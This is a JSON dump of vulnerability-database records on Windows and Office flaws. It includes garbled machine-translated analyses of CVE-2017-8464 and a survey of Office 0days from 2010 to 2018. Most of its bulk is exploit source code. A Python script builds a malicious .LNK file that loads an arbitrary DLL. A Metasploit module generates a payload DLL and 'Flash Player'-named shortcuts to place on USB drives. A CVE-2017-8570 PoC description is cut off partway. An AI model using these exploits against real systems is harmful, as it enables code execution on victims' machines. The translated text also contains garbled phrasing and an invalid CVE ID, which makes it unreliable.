com) \nMicrosoft in patch, by calling _IsRegisteredCPLApplet function of the DLL path validation failed will no longer call CPL_LoadCPLModule function. \nHanSight solutions \nHanSight Enterprise through the host log correlation analysis, summarizes the Stuxnet vulnerability in common, including the U disk plug acts and the host process behavior, etc., can detect such problems, and an alarm is generated: the \n! [](/Article/UploadPic/2017-8/201789195027690. png? www. myhack58. com) \nPrevention policy recommendations \n1\\. Use HanSight Enterprise monitoring host behavior in a timely manner to warn the Troubleshooting process. \n2\\. Update Windows operating system patches \nhttps://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464 \nReferences \n1\\. Metasploit \n2\\. Shell Link (. LNK) File format: \nhttps://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]. pdf \n\n", "cvss3": {}, "published": "2017-08-09T00:00:00", "type": "myhack58", "title": "\u201cThe seismic network of the third generation\u201dCVE-2017-8464 vulnerability analysis and early warning-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2107-8464", "CVE-2010-2568"], "modified": "2017-08-09T00:00:00", "id": "MYHACK58:62201788476", "href": "http://www.myhack58.com/Article/html/3/62/2017/88476.htm", "sourceData": "", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. 
\nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. 
\nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. 
\nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. 
\n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "cvss3": {}, "published": "2019-06-13T00:00:00", "type": "myhack58", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - .LNK Shortcut File Code Execution", "cvss3": {}, "published": "2017-08-06T00:00:00", "type": "exploitpack", "title": "Microsoft Windows - .LNK Shortcut File Code Execution", "bulletinFamily": "exploit", 
"hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-08-06T00:00:00", "id": "EXPLOITPACK:20DF492E20233C084EF3A6265A4CB16A", "href": "", "sourceData": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Title : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\n# CVE : 2017-8464\n# Authors : [ykoster, nixawk]\n# Notice : Only for educational purposes.\n# Support : python2\n\nimport struct\n\n\ndef generate_SHELL_LINK_HEADER():\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | HeaderSize |\n # -----------------------------------------------------------------\n # | LinkCLSID (16 bytes) |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | LinkFlags |\n # -----------------------------------------------------------------\n # | FileAttributes |\n # -----------------------------------------------------------------\n # | CreationTime |\n # -----------------------------------------------------------------\n # | ... 
|\n # -----------------------------------------------------------------\n # | AccessTime |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | WriteTime |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n # | FileSize |\n # -----------------------------------------------------------------\n # | IconIndex |\n # -----------------------------------------------------------------\n # | ShowCommand |\n # -----------------------------------------------------------------\n # | HotKey | Reserved1 |\n # -----------------------------------------------------------------\n # | Reserved2 |\n # -----------------------------------------------------------------\n # | Reserved3 |\n # -----------------------------------------------------------------\n\n shell_link_header = [\n b'\\x4c\\x00\\x00\\x00', # \"HeaderSize\" : (4 bytes)\n b'\\x01\\x14\\x02\\x00\\x00\\x00\\x00\\x00\\xc0\\x00\\x00\\x00\\x00\\x00\\x00\\x46', # \"LinkCLSID\" : (16 bytes) HKEY_CLASSES_ROOT\\CLSID\\{00021401-0000-0000-C000-000000000046}\n b'\\x81\\x00\\x00\\x00', # \"LinkFlags\" : (4 bytes) 0x81 = 0b10000001 = HasLinkTargetIDList + IsUnicode\n b'\\x00\\x00\\x00\\x00', # \"FileAttributes\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"CreationTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"AccessTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00', # \"WriteTime\" : (8 bytes)\n b'\\x00\\x00\\x00\\x00', # \"FileSize\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"IconIndex\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"ShowCommand\" : (4 bytes)\n b'\\x00\\x00', # \"HotKey\" : (2 bytes)\n b'\\x00\\x00', # \"Reserved1\" : (2 bytes)\n b'\\x00\\x00\\x00\\x00', # \"Reserved2\" : (4 bytes)\n b'\\x00\\x00\\x00\\x00', # \"Reserved3\" : (4 bytes)\n ]\n\n return 
b\"\".join(shell_link_header)\n\n\ndef generate_LINKTARGET_IDLIST(path, name):\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | IDListSize | IDList(variable) |\n # -----------------------------------------------------------------\n # | ... |\n # -----------------------------------------------------------------\n\n # IDList = ItemID + ItemID + ... + TerminalID\n # ItemID = ItemIDSize + Data\n\n def generate_ItemID(Data):\n itemid = [\n struct.pack('H', len(Data) + 2), # ItemIDSize + len(Data)\n Data\n ]\n # ItemIDSize = struct.pack('H', len(Data) + 2) # ItemIDSize + len(Data)\n\n # return ItemIDSize + Data\n\n return b\"\".join(itemid)\n\n def generate_cpl_applet(path, name=name):\n name += b'\\x00'\n path += b'\\x00'\n\n bindata = [\n b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x6a\\x00\\x00\\x00\\x00\\x00\\x00',\n struct.pack('H', len(path)),\n struct.pack('H', len(name)),\n path.encode('utf-16')[2:],\n name.encode('utf-16')[2:],\n b\"\\x00\\x00\" # comment\n ]\n\n return b\"\".join(bindata)\n\n idlist = [\n # ItemIDList\n\n generate_ItemID(b'\\x1f\\x50\\xe0\\x4f\\xd0\\x20\\xea\\x3a\\x69\\x10\\xa2\\xd8\\x08\\x00\\x2b\\x30\\x30\\x9d'),\n generate_ItemID(b'\\x2e\\x80\\x20\\x20\\xec\\x21\\xea\\x3a\\x69\\x10\\xa2\\xdd\\x08\\x00\\x2b\\x30\\x30\\x9d'),\n generate_ItemID(generate_cpl_applet(path)),\n\n b'\\x00\\x00', # TerminalID\n ]\n\n idlist = b\"\".join(idlist)\n idlistsize = struct.pack('H', len(idlist))\n\n linktarget_idlist = [\n idlistsize,\n idlist,\n ]\n\n return b\"\".join(linktarget_idlist)\n\n\ndef generate_EXTRA_DATA():\n # ExtraData refers to a set of structures that convey additional information about a link target. 
These\n # optional structures can be present in an extra data section that is appended to the basic Shell Link\n # Binary File Format.\n\n # EXTRA_DATA = *EXTRA_DATA_BLOCK TERMINAL_BLOCK\n\n # EXTRA_DATA_BLOCK = CONSOLE_PROPS / CONSOLE_FE_PROPS / DARWIN_PROPS /\n # ENVIRONMENT_PROPS / ICON_ENVIRONMENT_PROPS /\n # KNOWN_FOLDER_PROPS / PROPERTY_STORE_PROPS /\n # SHIM_PROPS / SPECIAL_FOLDER_PROPS /\n # TRACKER_PROPS / VISTA_AND_ABOVE_IDLIST_PROPS\n\n # SpecialFolderDataBlock\n\n # _________________________________________________________________\n # | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | |\n # |0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|2|3|4|5|6|7|8|9|0|1|\n # -----------------------------------------------------------------\n # | BlockSize |\n # -----------------------------------------------------------------\n # | BlockSignatire |\n # -----------------------------------------------------------------\n # | SpecialFolderID |\n # -----------------------------------------------------------------\n # | Offset |\n # -----------------------------------------------------------------\n\n extra_data = [\n b'\\x10\\x00\\x00\\x00',\n b'\\x05\\x00\\x00\\xA0',\n b'\\x03\\x00\\x00\\x00',\n b'\\x28\\x00\\x00\\x00',\n b'\\x00\\x00\\x00\\x00' # TERMINAL_BLOCK\n ]\n\n return b\"\".join(extra_data)\n\n\ndef ms_shllink(path, name=b\"Microsoft\"):\n '''build Shell Link (.LNK) Binary File Format'''\n\n lnk_format = [\n\n # Structures\n\n # SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]\n # [STRING_DATA] *EXTRA_DATA\n\n\n # SHELL_LINK_HEADER:\n # A ShelllinkHeader structure which contains identification information, timestamps, and\n # flags that specify the presence of optional structures.\n\n generate_SHELL_LINK_HEADER(),\n\n # LINKTARGET_IDLIST:\n # An optional LinkTargetIDList structure, which specifies the target of the link. 
The\n # presence of this structure is specified by the HasLinkTargetIDList bit in the ShellLinkHeader.\n #\n #\n\n generate_LINKTARGET_IDLIST(path, name),\n\n # LINKINFO:\n # An optional LinkInfo structure, which specifies information necessary to resolve the link target.\n # The presence of this structure is specified by the HasLinkInfo bit in the ShellLinkHeader.\n\n # STRING_DATA:\n # Zero or more optional StringData structures, which are used to convey user interface and path\n # identification information. The presence of these structures is specified by bits in the ShellLinkHeader.\n\n # STRING_DATA = [NAME_STRING] [RELATIVE_PATH] [WORKING_DIR]\n # [COMMAND_LINE_ARGUMENTS] [ICON_LOCATION]\n\n # EXTRA_DATA:\n # Zero or more ExtraData structures\n\n generate_EXTRA_DATA()\n ]\n\n return b\"\".join(lnk_format)\n\n\nif __name__ == '__main__':\n import sys\n\n if len(sys.argv) != 3:\n print(\"[*] Name : CVE-2017-8464 | LNK Remote Code Execution Vulnerability\")\n print(\"[*] Usage: %s </path/to/test.lnk> </path/to/test.dll>\" % sys.argv[0])\n sys.exit(0)\n\n lnkpath = sys.argv[1]\n dllpath = sys.argv[2]\n\n bindata = ms_shllink(path=dllpath)\n\n with open(lnkpath, 'wb') as lnkf:\n lnkf.write(bindata)\n\n\n## References\n\n# 1. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464\n# 2. https://msdn.microsoft.com/en-us/library/dd871305.aspx\n# 3. https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SHLLINK/[MS-SHLLINK]-160714.pdf\n# 4. https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf\n# 5. https://support.microsoft.com/en-us/help/149648/description-of-control-panel--cpl-files\n# 6. https://twitter.com/mkolsek/status/877499744704237568\n# 7. https://community.saas.hpe.com/t5/Security-Research/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/251257#.WXi4uNPys6g\n# 8. 
https://github.com/rapid7/metasploit-framework/pull/8767", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Windows - .LNK Shortcut File Code Execution (Metasploit)", "cvss3": {}, "published": "2017-07-26T00:00:00", "type": "exploitpack", "title": "Microsoft Windows - .LNK Shortcut File Code Execution (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8464", "CVE-2015-0096"], "modified": "2017-07-26T00:00:00", "id": "EXPLOITPACK:773C207F8B68CF5AB40483F3A9751D81", "href": "", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n\n attr_accessor :exploit_dll_name\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LNK Remote Code Execution Vulnerability',\n 'Description' => %q{\n This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)\n that contain a dynamic icon, loaded from a malicious DLL.\n\n This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is\n similar except in an additional SpecialFolderDataBlock is included. The folder ID set\n in this SpecialFolderDataBlock is set to the Control Panel. This is enought to bypass\n the CPL whitelist. 
This bypass can be used to trick Windows into loading an arbitrary\n DLL file.\n },\n 'Author' =>\n [\n 'Uncredited', # vulnerability discovery\n 'Yorick Koster' # msf module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2017-8464'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'],\n ['URL', 'http://paper.seebug.org/357/'], # writeup\n ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'] # writeup\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ],\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ]\n ],\n 'DefaultTarget' => 0, # Default target is 64-bit\n 'DisclosureDate' => 'Jun 13 2017'))\n\n register_advanced_options(\n [\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])\n ])\n end\n\n def exploit\n dll = generate_payload_dll\n dll_name = \"#{rand_text_alpha(16)}.dll\"\n dll_path = store_file(dll, dll_name)\n print_status(\"#{dll_path} created copy it to the root folder of the target USB drive\")\n\n # HACK the vulnerability doesn't appear to work with UNC paths\n # Create LNK files to different drives instead\n 'DEFGHIJKLMNOPQRSTUVWXYZ'.split(\"\").each do |i|\n lnk = generate_link(\"#{i}:\\\\#{dll_name}\")\n lnk_path = store_file(lnk, \"#{rand_text_alpha(16)}_#{i}.lnk\")\n print_status(\"#{lnk_path} create, copy to the USB drive if drive letter is #{i}\")\n end\n end\n\n def generate_link(path)\n path << \"\\x00\"\n display_name = \"Flash Player\\x00\" # LNK Display Name\n comment = \"\\x00\"\n\n # Control Panel Applet ItemID with our DLL\n cpl_applet = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, \n 0x00, 0x00\n ].pack('C*')\n cpl_applet << [path.length].pack('v')\n cpl_applet << 
[display_name.length].pack('v')\n cpl_applet << path.unpack('C*').pack('v*')\n cpl_applet << display_name.unpack('C*').pack('v*')\n cpl_applet << comment.unpack('C*').pack('v*')\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C\n 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046\n 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode)\n 0x00, 0x00, 0x00, 0x00, # FileAttributes\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime\n 0x00, 0x00, 0x00, 0x00, # FileSize\n 0x00, 0x00, 0x00, 0x00, # IconIndex\n 0x00, 0x00, 0x00, 0x00, # ShowCommand\n 0x00, 0x00, # HotKey\n 0x00, 0x00, # Reserved1\n 0x00, 0x00, 0x00, 0x00, # Reserved2\n 0x00, 0x00, 0x00, 0x00 # Reserved3\n ].pack('C*')\n\n # IDList\n idlist_data = ''\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\n idlist_data << [\n # This PC\n 0x1f, 0x50, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v') # ItemIDSize\n idlist_data << [\n # All Control Panel Items\n 0x2e, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [cpl_applet.length + 2].pack('v')\n idlist_data << cpl_applet\n idlist_data << [0x00].pack('v') # TerminalID\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData\n # SpecialFolderDataBlock\n ret << [\n 0x10, 0x00, 0x00, 0x00, # BlockSize\n 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005\n 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\\Control Panel)\n 0x28, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList\n ].pack('C*')\n # TerminalBlock\n ret << 
[0x00, 0x00, 0x00, 0x00].pack('V')\n ret\n end\n\n # Store the file in the MSF local directory (eg, /root/.msf4/local/)\n def store_file(data, filename)\n ltype = \"exploit.fileformat.#{self.shortname}\"\n\n if ! ::File.directory?(Msf::Config.local_directory)\n FileUtils.mkdir_p(Msf::Config.local_directory)\n end\n\n if filename and not filename.empty?\n if filename =~ /(.*)\\.(.*)/\n ext = $2\n fname = $1\n else\n fname = filename\n end\n else\n fname = \"local_#{Time.now.utc.to_i}\"\n end\n\n fname = ::File.split(fname).last\n\n fname.gsub!(/[^a-z0-9\\.\\_\\-]+/i, '')\n fname << \".#{ext}\"\n\n path = File.join(\"#{Msf::Config.local_directory}/\", fname)\n full_path = ::File.expand_path(path)\n File.open(full_path, \"wb\") { |fd| fd.write(data) }\n\n full_path.dup\n end\nend", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:32", "description": "\nMicrosoft Office - Composite Moniker Remote Code Execution", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-01-09T00:00:00", "type": "exploitpack", "title": "Microsoft Office - Composite Moniker Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8570", "CVE-2017-0199"], "modified": "2018-01-09T00:00:00", "id": "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "href": "", "sourceData": "## What?\n\nThis repo contains a Proof of Concept exploit for CVE-2017-8570, a.k.a the \"Composite Moniker\" vulnerability. This demonstrates using the Packager.dll trick to drop an sct file into the %TEMP% directory, and then execute it using the primitive that the vulnerability provides.\n\nDownload: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44263.zip\n\n## Why?\n\nA few reasons.\n\n1. I wanted to see if it was possible to use the [Packager.dll file-dropping trick](https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/) to exploit this vulnerability.\n2. As far as I'm aware, all other public exploits for CVE-2017-8570 are actually exploiting the \"Script Moniker\" variant of CVE-2017-0199 and are not actually composite moniker exploits.\n3. 
